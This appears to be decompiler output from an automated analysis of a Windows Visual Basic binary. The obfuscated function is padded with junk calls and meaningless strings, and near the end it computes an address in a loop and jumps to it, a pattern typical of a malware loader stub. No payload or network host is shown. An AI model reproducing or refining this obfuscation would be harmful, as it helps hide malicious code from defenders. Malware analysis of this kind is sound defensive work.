				intOrPtr* _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				intOrPtr* _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				void* _t799;
				signed int _t800;
				signed int _t804;
				signed int _t808;
				signed int _t828;
				signed int _t831;
				signed int _t834;
				signed int _t841;
				signed int _t847;
				signed int _t851;
				signed int _t855;
				signed int _t864;
				signed int _t865;
				signed int _t874;
				signed int _t878;
				signed int _t895;
				signed int _t900;
				signed int _t909;
				signed int _t913;
				signed int _t914;
				signed int _t918;
				signed int _t928;
				signed int* _t931;
				signed int _t937;
				signed int _t942;
				signed int _t944;
				signed int _t955;
				char* _t957;
				char* _t959;
				signed int _t962;
				signed int _t967;
				signed int _t973;
				signed int _t980;
				char* _t985;
				char* _t987;
				char* _t991;
				signed int _t999;
				signed int _t1004;
				signed int _t1013;
				signed int _t1018;
				signed int _t1026;
				signed int _t1034;
				signed int* _t1038;
				signed int _t1049;
				signed int _t1053;
				signed int _t1057;
				signed int* _t1061;
				signed int _t1064;
				signed int _t1075;
				signed int _t1081;
				char* _t1085;
				signed int* _t1086;
				signed int _t1089;
				signed int* _t1098;
				signed int* _t1099;
				char* _t1119;
				char* _t1193;
				void* _t1219;
				void* _t1221;
				intOrPtr _t1222;
				intOrPtr* _t1223;
				void* _t1224;
				void* _t1225;
				void* _t1226;
				void* _t1227;
				intOrPtr _t1235;
				signed int _t1282;
				long long _t1283;

				_t1222 = _t1221 - 0x18;
				 *[fs:0x0] = _t1222;
				L00401480();
				_v28 = _t1222;
				_v24 = 0x4011c0;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				_t799 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401486, _t1219);
				_v8 = 1;
				_v8 = 2;
				_push(0);
				_push(1);
				_push(2);
				L004016AE();
				if(_t799 != 0x102) {
					_v8 = 3;
					_v8 = 4;
					if( *0x41331c != 0) {
						_v440 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v440 = 0x41331c;
					}
					_v376 =  *_v440;
					_t1085 =  &_v204;
					L0040169C();
					_t1222 = _t1222 + 0x10;
					L004016A2();
					_t1086 =  &_v184;
					L004016A8();
					_t1089 =  *((intOrPtr*)( *_v376 + 0xc))(_v376, _t1086, _t1086, _t1085, _t1085, _t1085, _v156, L"UULjaijLMUuw190", 0);
					asm("fclex");
					_v380 = _t1089;
					if(_v380 >= 0) {
						_v444 = _v444 & 0x00000000;
					} else {
						_push(0xc);
						_push(0x40dddc);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v444 = _t1089;
					}
					L004016C0();
					L00401696();
				}
				_v8 = 6;
				_v260 = L"Firsaarsfdselsdage";
				_v268 = 8;
				L0040167E();
				_t800 =  &_v204;
				_push(_t800);
				L00401684();
				L0040168A();
				_push(_t800);
				_push(L"String");
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t800));
				L004016C6();
				L00401696();
				_t804 = _v376;
				if(_t804 != 0) {
					_v8 = 7;
					_v8 = 8;
					_push(0x61);
					L00401678();
					_v144 = _t804;
				}
				_v8 = 0xa;
				_push(0x40de98);
				L0040166C();
				_push(_t804);
				L00401672();
				L0040168A();
				_push(_t804);
				_push(0x40dea4);
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t804));
				L004016C6();
				_t808 = _v376;
				_t1235 = _t808;
				if(_t1235 != 0) {
					_v8 = 0xb;
					_v8 = 0xc;
					_push(0x5e);
					L00401666();
					_v168 = _t808;
				}
				_v8 = 0xe;
				_v356 = 0x4cfd;
				_v364 = 0x894cfd;
				_v360 =  *0x4013b8;
				_v352 = 0x1717;
				_t1098 =  &_v172;
				L00401660();
				_v372 =  *0x4013b0;
				_t1282 =  *0x4013a8;
				_v100 = _t1282;
				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v372, 0x38543700, 0x5b04,  &_v172,  &_v352,  &_v360, 0xd506b040, 0x5af6,  &_v364, 0x7fcc33,  &_v356, _t1098, _t1098);
				_t1099 =  &_v172;
				L004016C6();
				_v8 = 0xf;
				_v212 = 0x80020004;
				_v220 = 0xa;
				_v196 = 0x80020004;
				_v204 = 0xa;
				_push( &_v220);
				_push( &_v204);
				asm("fld1");
				_push(_t1099);
				_push(_t1099);
				_v164 = _t1282;
				asm("fld1");
				_push(_t1099);
				_push(_t1099);
				_v172 = _t1282;
				asm("fld1");
				_push(_t1099);
				_push(_t1099);
				_v180 = _t1282;
				asm("fld1");
				_push(_t1099);
				_push(_t1099);
				_v188 = _t1282;
				L00401654();
				L0040165A();
				asm("fcomp qword [0x4013a0]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t1235 == 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_v448 = 1;
				}
				_v376 =  ~_v448;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				_t1223 = _t1222 + 0xc;
				if(_v376 != 0) {
					_v8 = 0x10;
					_v452 =  *0x401398 *  *0x401390;
					 *_t1223 = _v452;
					_t1081 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t1099);
					asm("fclex");
					_v376 = _t1081;
					if(_v376 >= 0) {
						_v456 = _v456 & 0x00000000;
					} else {
						_push(0x84);
						_push(0x40da14);
						_push(_a4);
						_push(_v376);
						L004016D8();
						_v456 = _t1081;
					}
				}
				_v8 = 0x12;
				_v196 = 0x20;
				_v204 = 2;
				_push( &_v204);
				_push(1);
				_push( &_v220);
				L00401642();
				_v276 = 0x40dec8;
				_v284 = 0x8008;
				_push( &_v220);
				_t828 =  &_v284;
				_push(_t828);
				L00401648();
				_v376 = _t828;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				_t1224 = _t1223 + 0xc;
				_t831 = _v376;
				if(_t831 != 0) {
					_v8 = 0x13;
					_v8 = 0x14;
					_push(0xffea4050);
					_push(L"moderskabernes");
					_push(L"KLARLG");
					_push(0);
					L0040163C();
					_v164 = _t831;
				}
				_v8 = 0x16;
				_push(0x40de98);
				L0040166C();
				_push(_t831);
				_push( &_v204);
				L00401636();
				_v260 = 0x40dea4;
				_v268 = 0x8008;
				_push( &_v204);
				_t834 =  &_v268;
				_push(_t834);
				L00401648();
				_v376 = _t834;
				L00401696();
				if(_v376 != 0) {
					_v8 = 0x17;
					_v8 = 0x18;
					if( *0x41331c != 0) {
						_v460 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v460 = 0x41331c;
					}
					_v376 =  *_v460;
					_v324 = 0x2f5590;
					_v332 = 3;
					_v308 = 0x5a05e8;
					_v316 = 3;
					_v292 = 0x18;
					_v300 = 2;
					_v276 = 0x4fac9d;
					_v284 = 3;
					_v260 = L"Totalization";
					_v268 = 8;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t1075 =  *((intOrPtr*)( *_v376 + 0x44))(_v376, 0x10, 0x10, 0x10, 0x10, 0x10,  &_v184);
					asm("fclex");
					_v380 = _t1075;
					if(_v380 >= 0) {
						_v464 = _v464 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x40dddc);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v464 = _t1075;
					}
					_v412 = _v184;
					_v184 = _v184 & 0x00000000;
					_v196 = _v412;
					_v204 = 9;
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v104);
					L00401630();
					L00401696();
				}
				_v8 = 0x1a;
				_t1283 =  *0x401388;
				_v360 = _t1283;
				L00401660();
				_v352 = 0x261c;
				_t841 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v352,  &_v172, 0x102a, 0x175e,  &_v360, 0x130a71);
				_v376 = _t841;
				if(_v376 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x40da44);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v468 = _t841;
				}
				L004016C6();
				_v8 = 0x1b;
				_v260 = L"10/10/10";
				_v268 = 8;
				L0040167E();
				_push( &_v204);
				_push( &_v220);
				L00401624();
				_push( &_v220);
				L0040162A();
				_v116 = _t1283;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				_t1225 = _t1224 + 0xc;
				_v8 = 0x1c;
				_v196 = 0x4b;
				_v204 = 2;
				_t847 =  &_v204;
				_push(_t847);
				L0040161E();
				L0040168A();
				_push(_t847);
				_push(0x40df58);
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t847));
				L004016C6();
				L00401696();
				_t851 = _v376;
				if(_t851 != 0) {
					_v8 = 0x1d;
					_v8 = 0x1e;
					_push(0x14);
					L00401618();
					_v128 = _t851;
				}
				_v8 = 0x20;
				_v260 = L"2:2:2";
				_v268 = 8;
				L0040167E();
				_push( &_v204);
				_push( &_v220);
				L00401612();
				_v276 = 2;
				_v284 = 0x8002;
				_push( &_v220);
				_t855 =  &_v284;
				_push(_t855);
				L00401648();
				_v376 = _t855;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				_t1226 = _t1225 + 0xc;
				if(_v376 != 0) {
					_v8 = 0x21;
					_t1057 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v184);
					asm("fclex");
					_v376 = _t1057;
					if(_v376 >= 0) {
						_v472 = _v472 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40da14);
						_push(_a4);
						_push(_v376);
						L004016D8();
						_v472 = _t1057;
					}
					if( *0x41331c != 0) {
						_v476 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v476 = 0x41331c;
					}
					_v380 =  *_v476;
					_v416 = _v184;
					_v184 = _v184 & 0x00000000;
					_t1061 =  &_v188;
					L004016BA();
					_t1064 =  *((intOrPtr*)( *_v380 + 0x40))(_v380, _t1061, _t1061, _v416, L"Moaria");
					asm("fclex");
					_v384 = _t1064;
					if(_v384 >= 0) {
						_v480 = _v480 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x40dddc);
						_push(_v380);
						_push(_v384);
						L004016D8();
						_v480 = _t1064;
					}
					L004016C0();
				}
				_v8 = 0x23;
				_v364 = 0x2444d0;
				_v360 = 0x3c014f;
				L00401660();
				_t864 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, L"Lezannes",  &_v172, 0x836eee,  &_v360, 0x2e66,  &_v364, 0x1750a7);
				_v376 = _t864;
				if(_v376 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40da44);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v484 = _t864;
				}
				L004016C6();
				_v8 = 0x24;
				_v196 = 9;
				_v204 = 2;
				_t865 =  &_v204;
				_push(_t865);
				L0040160C();
				L0040168A();
				_push(_t865);
				_push(0x40dfc0);
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t865));
				L004016C6();
				L00401696();
				if(_v376 != 0) {
					_v8 = 0x25;
					if( *0x41331c != 0) {
						_v488 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v488 = 0x41331c;
					}
					_v376 =  *_v488;
					_t1049 =  *((intOrPtr*)( *_v376 + 0x1c))(_v376,  &_v184);
					asm("fclex");
					_v380 = _t1049;
					if(_v380 >= 0) {
						_v492 = _v492 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40dddc);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v492 = _t1049;
					}
					_v384 = _v184;
					_t1053 =  *((intOrPtr*)( *_v384 + 0x50))(_v384);
					asm("fclex");
					_v388 = _t1053;
					if(_v388 >= 0) {
						_v496 = _v496 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x40de3c);
						_push(_v384);
						_push(_v388);
						L004016D8();
						_v496 = _t1053;
					}
					L004016C0();
				}
				_v8 = 0x27;
				_v212 = 1;
				_v220 = 2;
				_v260 = 0x40dfcc;
				_v268 = 8;
				L0040167E();
				_push( &_v220);
				_push(2);
				_push( &_v204);
				_push( &_v236);
				L00401606();
				_v292 = 0x40dfd8;
				_v300 = 0x8008;
				_push( &_v236);
				_t874 =  &_v300;
				_push(_t874);
				L00401648();
				_v376 = _t874;
				_push( &_v236);
				_push( &_v220);
				_push( &_v204);
				_push(3);
				L0040164E();
				_t1227 = _t1226 + 0x10;
				_t878 = _v376;
				if(_t878 != 0) {
					_v8 = 0x28;
					_v8 = 0x29;
					_v260 = _a4;
					_v268 = 9;
					_v292 = L"Underskriftsindsamling";
					_v300 = 8;
					_v324 = 0x559ada;
					_v332 = 3;
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t878 = 0x10;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"R8RKPuezMDYUe6qnGrDitDuDZFS86");
					_push(_v100);
					L00401600();
					_t1227 = _t1227 + 0x3c;
				}
				_v8 = 0x2b;
				_push(0x40e070);
				L004015FA();
				if(_t878 != 1) {
					_v8 = 0x2c;
					_push(L"Hemathidrosis8");
					_push(0x90);
					_push(0xffffffff);
					_push(0x20);
					L004015F4();
				}
				_v8 = 0x2e;
				_v352 = 0x2f52;
				L00401660();
				L00401660();
				_v360 = 0x1a6005;
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v360, 0x1997,  &_v172, 0x75f6990, 0x5af9,  &_v176, L"delbetnkning",  &_v352,  &_v364);
				_v152 = _v364;
				_push( &_v176);
				_push( &_v172);
				_push(2);
				L004015EE();
				_v8 = 0x2f;
				if( *0x41331c != 0) {
					_v500 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40ddec);
					L004016DE();
					_v500 = 0x41331c;
				}
				_v376 =  *_v500;
				_t895 =  *((intOrPtr*)( *_v376 + 0x14))(_v376,  &_v184);
				asm("fclex");
				_v380 = _t895;
				if(_v380 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40dddc);
					_push(_v376);
					_push(_v380);
					L004016D8();
					_v504 = _t895;
				}
				_v384 = _v184;
				_t900 =  *((intOrPtr*)( *_v384 + 0x58))(_v384,  &_v172);
				asm("fclex");
				_v388 = _t900;
				if(_v388 >= 0) {
					_v508 = _v508 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x40ddfc);
					_push(_v384);
					_push(_v388);
					L004016D8();
					_v508 = _t900;
				}
				_v420 = _v172;
				_v172 = _v172 & 0x00000000;
				L0040168A();
				L004016C0();
				_v8 = 0x30;
				L004015E8();
				_v8 = 0x31;
				L004015DC();
				L004015E2();
				L0040168A();
				_t1119 =  &_v204;
				L00401696();
				_v8 = 0x32;
				_v356 = 0x2f1f;
				_v352 = 0x4e6e;
				_v448 =  *0x401380;
				_v456 =  *0x401378;
				_t909 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x6ff6,  &_v352, _t1119,  &_v356, _t1119, _t1119, L"Circuted",  &_v372,  &_v204,  &_v204);
				_v376 = _t909;
				if(_v376 >= 0) {
					_v512 = _v512 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40da44);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v512 = _t909;
				}
				_v68 = _v372;
				_v64 = _v368;
				_v8 = 0x33;
				_v260 = 0x40e100;
				_v268 = 8;
				_v276 = 1;
				_v284 = 0x8002;
				_push( &_v268);
				_t913 =  &_v284;
				_push(_t913);
				L00401648();
				_t914 = _t913;
				if(_t914 != 0) {
					_v8 = 0x34;
					_t1034 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v184);
					asm("fclex");
					_v376 = _t1034;
					if(_v376 >= 0) {
						_v516 = _v516 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x40da14);
						_push(_a4);
						_push(_v376);
						L004016D8();
						_v516 = _t1034;
					}
					if( *0x41331c != 0) {
						_v520 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v520 = 0x41331c;
					}
					_v380 =  *_v520;
					_v424 = _v184;
					_v184 = _v184 & 0x00000000;
					_t1038 =  &_v188;
					L004016BA();
					_t914 =  *((intOrPtr*)( *_v380 + 0x40))(_v380, _t1038, _t1038, _v424, L"Skamsttter8");
					asm("fclex");
					_v384 = _t914;
					if(_v384 >= 0) {
						_v524 = _v524 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x40dddc);
						_push(_v380);
						_push(_v384);
						L004016D8();
						_v524 = _t914;
					}
					L004016C0();
				}
				_v8 = 0x36;
				_push(0x40e124);
				_push(0x40e124);
				L00401690();
				if(_t914 != 0) {
					_v8 = 0x37;
					_v8 = 0x38;
					_push(0);
					_push(L"isogamous");
					_push( &_v204);
					L004015D6();
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v44);
					L00401630();
					L00401696();
				}
				_v8 = 0x3a;
				_v260 = L"21:21:21";
				_v268 = 8;
				L0040167E();
				_push( &_v204);
				_push( &_v220);
				L004015D0();
				_v276 = 0x15;
				_v284 = 0x8002;
				_push( &_v220);
				_t918 =  &_v284;
				_push(_t918);
				L00401648();
				_v376 = _t918;
				_push( &_v220);
				_push( &_v204);
				_push(2);
				L0040164E();
				if(_v376 != 0) {
					_v8 = 0x3b;
					_v8 = 0x3c;
					if( *0x41331c != 0) {
						_v528 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v528 = 0x41331c;
					}
					_v376 =  *_v528;
					_v260 = 0x2e;
					_v268 = 2;
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t1026 =  *((intOrPtr*)( *_v376 + 0x34))(_v376, 0x10, 0x590,  &_v184);
					asm("fclex");
					_v380 = _t1026;
					if(_v380 >= 0) {
						_v532 = _v532 & 0x00000000;
					} else {
						_push(0x34);
						_push(0x40dddc);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v532 = _t1026;
					}
					_v428 = _v184;
					_v184 = _v184 & 0x00000000;
					_push(_v428);
					_push( &_v160);
					L004016BA();
				}
				_v8 = 0x3e;
				L00401660();
				L00401660();
				_v360 = 0x833ac7;
				L00401660();
				_t928 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x811, 0x5c6238,  &_v172, L"Turns5",  &_v360,  &_v176,  &_v180, 0x259dc8);
				_v376 = _t928;
				if(_v376 >= 0) {
					_v536 = _v536 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40da44);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v536 = _t928;
				}
				_push( &_v180);
				_push( &_v176);
				_t931 =  &_v172;
				_push(_t931);
				_push(3);
				L004015EE();
				_v8 = 0x3f;
				_push(0x40dea4);
				L004015CA();
				if(_t931 != 0x61) {
					_v8 = 0x40;
					_v8 = 0x41;
					if( *0x41331c != 0) {
						_v540 = 0x41331c;
					} else {
						_push(0x41331c);
						_push(0x40ddec);
						L004016DE();
						_v540 = 0x41331c;
					}
					_v376 =  *_v540;
					_t1013 =  *((intOrPtr*)( *_v376 + 0x1c))(_v376,  &_v184);
					asm("fclex");
					_v380 = _t1013;
					if(_v380 >= 0) {
						_v544 = _v544 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40dddc);
						_push(_v376);
						_push(_v380);
						L004016D8();
						_v544 = _t1013;
					}
					_v384 = _v184;
					_t1018 =  *((intOrPtr*)( *_v384 + 0x64))(_v384, 1,  &_v352);
					asm("fclex");
					_v388 = _t1018;
					if(_v388 >= 0) {
						_v548 = _v548 & 0x00000000;
					} else {
						_push(0x64);
						_push(0x40de3c);
						_push(_v384);
						_push(_v388);
						L004016D8();
						_v548 = _t1018;
					}
					_v136 = _v352;
					L004016C0();
				}
				_v8 = 0x43;
				if( *0x41331c != 0) {
					_v552 = 0x41331c;
				} else {
					_push(0x41331c);
					_push(0x40ddec);
					L004016DE();
					_v552 = 0x41331c;
				}
				_v376 =  *_v552;
				_t937 =  *((intOrPtr*)( *_v376 + 0x14))(_v376,  &_v184);
				asm("fclex");
				_v380 = _t937;
				if(_v380 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x40dddc);
					_push(_v376);
					_push(_v380);
					L004016D8();
					_v556 = _t937;
				}
				_v384 = _v184;
				_t942 =  *((intOrPtr*)( *_v384 + 0x130))(_v384,  &_v172);
				asm("fclex");
				_v388 = _t942;
				if(_v388 >= 0) {
					_v560 = _v560 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40ddfc);
					_push(_v384);
					_push(_v388);
					L004016D8();
					_v560 = _t942;
				}
				_v432 = _v172;
				_v172 = _v172 & 0x00000000;
				L0040168A();
				L004016C0();
				_v8 = 0x44;
				_v196 = 0x20;
				_v204 = 2;
				_t944 =  &_v204;
				_push(_t944);
				_push(1);
				L004015C4();
				L0040168A();
				_push(_t944);
				_push(0x40dec8);
				L00401690();
				asm("sbb eax, eax");
				_v376 =  ~( ~( ~_t944));
				L004016C6();
				L00401696();
				if(_v376 != 0) {
					_v8 = 0x45;
					_v8 = 0x46;
					_push(0);
					_push(L"Outpushed1");
					_push( &_v204);
					L004015D6();
					_push(0x10);
					L00401480();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v40);
					L00401630();
					L00401696();
				}
				_v8 = 0x48;
				_v356 = 0x4cf0;
				_v352 = 0x442;
				_v372 =  *0x401370;
				L00401660();
				_t955 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v172,  &_v372, 0x108, 0x122123, 0xfffcfd10, 0x5af4,  &_v352, 0x465b67,  &_v356, 0x2bf0);
				_v376 = _t955;
				if(_v376 >= 0) {
					_v564 = _v564 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x40da44);
					_push(_a4);
					_push(_v376);
					L004016D8();
					_v564 = _t955;
				}
				L004016C6();
				_v8 = 0x49;
				_v260 =  &_v124;
				_v268 = 0x6003;
				_t957 =  &_v268;
				_push(_t957);
				L004015BE();
				if(_t957 == 0xffff) {
					_v8 = 0x4c;
					_t647 =  &_v96; // 0x40e070
					_v260 = _t647;
					_v268 = 0x6003;
					_t959 =  &_v268;
					_push(_t959);
					L004015BE();
					if(_t959 == 0xffff) {
						_v8 = 0x4f;
						_push(L"Flavic7");
						_push(L"Frdigbyggende");
						_push( &_v204); // executed
						L004015B8(); // executed
						_v260 = _v260 & 0x00000000;
						_v268 = 0x8008;
						_push( &_v204);
						_t962 =  &_v268;
						_push(_t962);
						L00401648();
						_v376 = _t962;
						L00401696();
						if(_v376 != 0) {
							_v8 = 0x50;
							_v8 = 0x51;
							if( *0x41331c != 0) {
								_v568 = 0x41331c;
							} else {
								_push(0x41331c);
								_push(0x40ddec);
								L004016DE();
								_v568 = 0x41331c;
							}
							_v376 =  *_v568;
							_t999 =  *((intOrPtr*)( *_v376 + 0x4c))(_v376,  &_v184);
							asm("fclex");
							_v380 = _t999;
							if(_v380 >= 0) {
								_v572 = _v572 & 0x00000000;
							} else {
								_push(0x4c);
								_push(0x40dddc);
								_push(_v376);
								_push(_v380);
								L004016D8();
								_v572 = _t999;
							}
							_v384 = _v184;
							_t1004 =  *((intOrPtr*)( *_v384 + 0x24))(_v384, L"tricuspid", L"vehefte",  &_v172);
							asm("fclex");
							_v388 = _t1004;
							if(_v388 >= 0) {
								_v576 = _v576 & 0x00000000;
							} else {
								_push(0x24);
								_push(0x40e234);
								_push(_v384);
								_push(_v388);
								L004016D8();
								_v576 = _t1004;
							}
							_v436 = _v172;
							_v172 = _v172 & 0x00000000;
							L0040168A();
							L004016C0();
						}
						_v8 = 0x53;
						L004015B2();
						_v8 = 0x54;
						_t967 =  *((intOrPtr*)( *_a4 + 0x1b8))(_a4,  &_v352, 0xffffffff);
						asm("fclex");
						_v376 = _t967;
						if(_v376 >= 0) {
							_v580 = _v580 & 0x00000000;
						} else {
							_push(0x1b8);
							_push(0x40da14);
							_push(_a4);
							_push(_v376);
							L004016D8();
							_v580 = _t967;
						}
						_t973 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
						asm("fclex");
						_v380 = _t973;
						if(_v380 >= 0) {
							_v584 = _v584 & 0x00000000;
						} else {
							_push(0x1bc);
							_push(0x40da14);
							_push(_a4);
							_push(_v380);
							L004016D8();
							_v584 = _t973;
						}
						_v8 = 0x55;
						_v260 = _v260 & 0x00000000;
						_v256 = _v256 & 0x00000000;
						_v268 = 6;
						L004015AC();
						while(1) {
							_v8 = 0x57;
							_v260 = 1;
							_v268 = 2;
							L004015A6();
							L004015AC();
							_v8 = 0x58;
							 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v204,  &_v268,  &_v88);
							_v8 = 0x59;
							_v196 = 0x20;
							_v204 = 2;
							_t980 =  &_v204;
							_push(_t980);
							_push(1);
							L004015C4();
							L0040168A();
							_push(_t980);
							_push(0x40dec8);
							L00401690();
							asm("sbb eax, eax");
							_v376 =  ~( ~( ~_t980));
							L004016C6();
							L00401696();
							if(_v376 != 0) {
								_v8 = 0x5a;
								_v8 = 0x5b;
								_push(0);
								_push(L"dwell");
								_push( &_v204);
								L004015D6();
								_push(0x10);
								L00401480();
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_push(0);
								_push(_v108);
								L00401630();
								L00401696();
							}
							_v8 = 0x5d;
							_v196 = 1;
							_v204 = 2;
							_push(0);
							_t985 =  &_v204;
							_push(_t985);
							L004015A0();
							L0040168A();
							L00401696();
							_v8 = 0x5e;
							_push(0);
							_push(0);
							_push(1);
							L0040159A();
							_t1193 = _t985;
							L0040168A();
							_v8 = 0x5f;
							_v260 = 0x2ffff;
							_v268 = 0x8003;
							_push( &_v88);
							_t987 =  &_v268;
							_push(_t987);
							L00401594();
							if(_t987 == 0) {
								break;
							}
						}
						_v8 = 0x62;
						_v260 = 0xff8ae8d9;
						do {
							_t1193 = _t1193 + 1;
						} while (_t1193 != 0xffcbf3e7);
						_a20 = _t1193 + 0x74a08d;
						_a20();
					} else {
					}
				} else {
				}
				_v20 = 0;
				asm("wait");
				_push(0x410c32);
				L004016C0();
				L004016C0();
				L00401696();
				L004016C6();
				L00401696();
				L004016C6();
				_t780 =  &_v96; // 0x40e070
				_push(0);
				L0040158E();
				L004016C0();
				L004016C0();
				L004016C0();
				L004016C6();
				_t991 =  &_v124;
				_push(_t991);
				_push(0);
				L0040158E();
				L004016C6();
				L004016C6();
				L004016C6();
				L004016C0();
				L004016C0();
				return _t991;
			}

0x0040ee6c
0x0040ee7b
0x0040ee87
0x0040ee8f
0x0040ee92
0x0040ee9f
0x0040eea8
0x0040eeab
0x0040eeba
0x0040eebd
0x0040eec4
0x0040eecb
0x0040eecd
0x0040eecf
0x0040eed1
0x0040eedb
0x0040eee1
0x0040eee8
0x0040eef6
0x0040ef13
0x0040eef8
0x0040eef8
0x0040eefd
0x0040ef02
0x0040ef07
0x0040ef07
0x0040ef25
0x0040ef38
0x0040ef3f
0x0040ef44
0x0040ef48
0x0040ef4e
0x0040ef55
0x0040ef69
0x0040ef6c
0x0040ef6e
0x0040ef7b
0x0040ef9d
0x0040ef7d
0x0040ef7d
0x0040ef7f
0x0040ef84
0x0040ef8a
0x0040ef90
0x0040ef95
0x0040ef95
0x0040efaa
0x0040efb5
0x0040efb5
0x0040efba
0x0040efc1
0x0040efcb
0x0040efe1
0x0040efe6
0x0040efec
0x0040efed
0x0040effa
0x0040efff
0x0040f000
0x0040f005
0x0040f00c
0x0040f012
0x0040f01f
0x0040f02a
0x0040f02f
0x0040f038
0x0040f03a
0x0040f041
0x0040f048
0x0040f04a
0x0040f04f
0x0040f04f
0x0040f055
0x0040f05c
0x0040f061
0x0040f066
0x0040f067
0x0040f074
0x0040f079
0x0040f07a
0x0040f07f
0x0040f086
0x0040f08c
0x0040f099
0x0040f09e
0x0040f0a5
0x0040f0a7
0x0040f0a9
0x0040f0b0
0x0040f0b7
0x0040f0b9
0x0040f0c1
0x0040f0c1
0x0040f0c7
0x0040f0ce
0x0040f0d7
0x0040f0e7
0x0040f0ed
0x0040f0fb
0x0040f101
0x0040f10c
0x0040f112
0x0040f11a
0x0040f168
0x0040f16e
0x0040f174
0x0040f179
0x0040f180
0x0040f18a
0x0040f194
0x0040f19e
0x0040f1ae
0x0040f1b5
0x0040f1b6
0x0040f1b8
0x0040f1b9
0x0040f1ba
0x0040f1bd
0x0040f1bf
0x0040f1c0
0x0040f1c1
0x0040f1c4
0x0040f1c6
0x0040f1c7
0x0040f1c8
0x0040f1cb
0x0040f1cd
0x0040f1ce
0x0040f1cf
0x0040f1d2
0x0040f1d7
0x0040f1dc
0x0040f1e2
0x0040f1e4
0x0040f1e5
0x0040f1f3
0x0040f1e7
0x0040f1e7
0x0040f1e7
0x0040f202
0x0040f20f
0x0040f216
0x0040f217
0x0040f219
0x0040f21e
0x0040f22a
0x0040f22c
0x0040f23f
0x0040f24c
0x0040f257
0x0040f25d
0x0040f25f
0x0040f26c
0x0040f28e
0x0040f26e
0x0040f26e
